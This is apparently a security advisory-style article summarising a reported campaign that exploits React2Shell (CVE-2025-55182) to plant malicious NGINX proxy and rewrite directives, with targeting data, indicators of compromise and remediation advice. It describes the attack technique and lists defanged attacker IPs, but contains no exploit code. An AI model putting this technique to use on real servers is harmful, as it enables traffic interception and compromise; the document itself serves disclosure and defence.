Security researchers at Datadog Security Labs have disclosed an active web traffic hijacking campaign exploiting React2Shell (CVE-2025-55182) to inject malicious configurations into NGINX servers. The campaign silently redirects legitimate traffic through attacker-controlled infrastructure while maintaining normal site functionality to avoid detection.
Campaign overview
| Attribute | Details |
|---|
| Vulnerability | CVE-2025-55182 (React2Shell) |
| CVSS score | 10.0 (Critical) |
| Attack type | Configuration injection → traffic hijacking |
| Active period | January 26 - February 2026+ |
| Source IPs observed | 1,083 unique IPs |
| Primary targets | Asian TLDs, government, education |
| Discovery | Datadog Security Labs |
| Published | February 4, 2026 |
Timeline
| Date | Event |
|---|
| November 29, 2025 | React2Shell disclosed to React Team |
| December 2025 | CVE-2025-55182 assigned |
| January 2026 | Widespread exploitation begins |
| January 26 - February 2, 2026 | 1,083 unique attacking IPs observed |
| February 4, 2026 | Datadog publishes NGINX hijacking analysis |
Attack methodology
Two-stage attack chain
| Stage | Action |
|---|
| 1 | Exploit React2Shell to gain server access |
| 2 | Inject malicious NGINX configuration directives |
| 3 | Traffic silently routed through attacker servers |
| 4 | Cryptomining or reverse shell payloads deployed |
NGINX configuration abuse
| Directive | Malicious use |
|---|
proxy_pass | Redirect traffic to attacker backend |
rewrite | Modify request URLs |
proxy_set_header | Preserve headers to avoid detection |
location blocks | Target specific paths |
Why detection is difficult
| Factor | Impact |
|---|
| No NGINX vulnerability | Legitimate features abused |
| Config files rarely audited | Malicious directives overlooked |
| Traffic still reaches destination | User experience unchanged |
| Header preservation | Requests appear normal |
Exploitation statistics
Traffic distribution
| Source | Percentage |
|---|
| 193.142.147[.]209 | ~28% |
| 87.121.84[.]24 | ~28% |
| Other IPs (1,081) | ~44% |
Two IP addresses account for 56% of all exploitation attempts two months after React2Shell disclosure.
Payload types observed
| Payload | Description |
|---|
| Cryptomining binaries | Downloaded from staging servers |
| Reverse shells | Direct connection to scanner IP |
| Traffic interception | Man-in-the-middle positioning |
Target profile
Geographic targeting
| Region | Targeting intensity |
|---|
| India (.in) | High |
| Indonesia (.id) | High |
| Peru (.pe) | Medium |
| Bangladesh (.bd) | Medium |
| Thailand (.th) | Medium |
Sector targeting
| Target type | Examples |
|---|
| Government (.gov) | State agencies, ministries |
| Education (.edu) | Universities, schools |
| Chinese hosting | Baota (BT) Panel users |
Infrastructure focus
| Platform | Risk level |
|---|
| Baota (BT) Panel | High (widely deployed in China) |
| NGINX with RSC | High |
| Next.js deployments | High |
React2Shell vulnerability details
CVE-2025-55182
| Attribute | Details |
|---|
| Name | React2Shell |
| Component | React Server Components (RSC) |
| Also affects | Next.js |
| Type | Unsafe deserialization |
| CVSS | 10.0 (Critical) |
| Discoverer | Lachlan Davidson |
| Authentication | None required |
Exploitation mechanism
| Step | Action |
|---|
| 1 | Attacker sends crafted serialized payload |
| 2 | Server deserializes without validation |
| 3 | Arbitrary code execution achieved |
| 4 | Full server compromise |
Detection guidance
Configuration indicators
| Indicator | What to look for |
|---|
| Unexpected proxy_pass | Unknown backend servers |
| Suspicious rewrite rules | Unusual URL modifications |
| Unknown location blocks | New routing directives |
| Modified headers | Altered proxy_set_header |
Network indicators
| Indicator | Detection method |
|---|
| Traffic to 193.142.147[.]209 | Firewall/proxy logs |
| Traffic to 87.121.84[.]24 | Network monitoring |
| Unexpected backend connections | Flow analysis |
| Config file modifications | File integrity monitoring |
Host indicators
| Indicator | Detection method |
|---|
| NGINX config changes | Configuration management |
| Cryptominer processes | Process monitoring |
| Reverse shell connections | Network connection audit |
| Unauthorized file writes | File system monitoring |
Indicators of compromise
Network IOCs
| Type | Value |
|---|
| IP | 193.142.147[.]209 |
| IP | 87.121.84[.]24 |
Configuration patterns
| Pattern | Risk |
|---|
| proxy_pass to unknown hosts | High |
| Encoded/obfuscated directives | Critical |
| New upstream definitions | Medium |
| Modified error pages | Medium |
| Priority | Action |
|---|
| Critical | Patch React/Next.js to latest versions |
| Critical | Audit NGINX configurations for unauthorized changes |
| High | Block known malicious IPs |
| High | Review server access logs for exploitation |
Configuration hardening
| Control | Purpose |
|---|
| Configuration management | Detect unauthorized changes |
| Git-based config tracking | Version control for nginx.conf |
| Principle of least privilege | Limit config write access |
| Regular config audits | Scheduled reviews |
Monitoring recommendations
| Area | Implementation |
|---|
| Config file integrity | AIDE, Tripwire, or osquery |
| Network traffic | Monitor for unexpected backends |
| Process execution | Track child processes from NGINX |
| Resource usage | Detect cryptomining activity |
Recommendations
For organizations running NGINX
| Priority | Action |
|---|
| Critical | Patch React Server Components/Next.js |
| Critical | Review all NGINX configurations |
| High | Implement configuration change monitoring |
| High | Audit upstream/backend definitions |
| Medium | Review Baota Panel deployments if applicable |
For security teams
| Priority | Action |
|---|
| High | Add IOCs to detection systems |
| High | Hunt for configuration anomalies |
| Medium | Review RSC/Next.js asset inventory |
| Medium | Assess Asian TLD exposure |
For DevOps teams
| Priority | Action |
|---|
| Critical | Version control all NGINX configs |
| High | Implement change detection alerts |
| High | Restrict config file write permissions |
| Medium | Automate configuration compliance checks |
Context
The React2Shell NGINX hijacking campaign demonstrates how attackers leverage critical vulnerabilities not just for immediate compromise, but to establish persistent traffic interception capabilities. By abusing legitimate NGINX features rather than exploiting NGINX itself, attackers create configurations that evade traditional vulnerability scanning.
The campaign’s focus on Asian TLDs and government/education targets suggests potential state-aligned or financially motivated actors seeking either intelligence collection or cryptomining revenue. The dual-payload approach—cryptomining and reverse shells—indicates operators may be monetizing access while maintaining persistent footholds.
The concentration of attack traffic from just two IP addresses (56% of attempts) provides defenders with high-confidence blocking indicators. However, the remaining 1,081 source IPs demonstrate the distributed nature of React2Shell exploitation.
Organizations running React Server Components or Next.js should treat patching as critical priority. The CVSS 10.0 score reflects the vulnerability’s severity: unauthenticated remote code execution with no user interaction required.
For NGINX administrators, this campaign reinforces that configuration files are attack surfaces requiring the same security rigor as application code. Configuration management, version control, and integrity monitoring should be standard practice for production deployments.
